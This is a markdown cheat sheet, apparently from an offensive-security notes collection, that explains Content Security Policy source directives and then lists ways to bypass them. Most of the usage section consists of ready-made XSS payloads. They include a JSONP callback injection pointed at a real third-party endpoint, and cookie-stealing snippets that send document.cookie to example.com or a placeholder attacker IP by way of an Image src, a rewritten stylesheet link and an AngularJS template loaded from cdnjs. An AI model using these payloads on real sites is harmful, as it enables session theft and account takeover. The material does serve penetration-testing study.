killchain-compendium/Exploits/Web/CSP.md

# Content Security Policy (CSP)

* Either in HTTP header or inside DOM's HTML 
* [CSP directives](https://content-security-policy.com/#directive)
* [CSP evaluator](https://csp-evaluator.withgoogle.com/)
* [Bypassing csp](https://blog.0daylabs.com/2016/09/09/bypassing-csp/)

## Sources
* `*` wildcard 
* `none`
* `self` for sources delivered through the same protocol
    * `default-src 'self';` may not load any script
* `unsafe-inline`
* `unsafe-eval` 
* `test.com` loads resources from domain but not subdomains
* `*.test.com` loads resources from subdomains
* `data:<content-type>...` critical usage
* `nonce` loads if nonce is correct. `sha256`, `sha384`, `sha512`
    * [style hasher](https://report-uri.com/home/hash)

## Usage 

### JSONP
Find JSONP endpoints through which to use custom callback functions
* [JSONBee](https://github.com/zigoo0/JSONBee)
```sh
"><script+src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script>
```

### Misconfiguration
Insert payload into `src` attribute

### Exfiltration
* [Beeceptor](beeceptor.com)
* Local webserver
* `connect-src` while Ajax/XHR requests are enabled
* Disguising as an `image-src` or `media-src` source
```html
<script>(new Image()).src = `https://example.com/${encodeURIComponent(document.cookie)}`</script>
```
other payloads
```sh
<link id="csp" rel=stylesheet href="" /><script nonce="abcdef">document.getElementById("csp").href="http://<attacker-IP>:8000/" + document.cookie;</script>
```
* 
```sh
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.3/prototype.min.js" integrity="sha512-C4LuwXQtQOF1iTRy3zwClYLsLgFLlG8nCV5dCxDjPcWsyFelQXzi3efHRjptsOzbHwwnXC3ZU+sWUh1gmxaTBA==" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.2/angular.min.js"></script>
<div ng-app ng-csp>
{{$on.curry.call().document.location='https://<attacker-IP>/' + $on.curry.call().document.cookie}}
</div>
```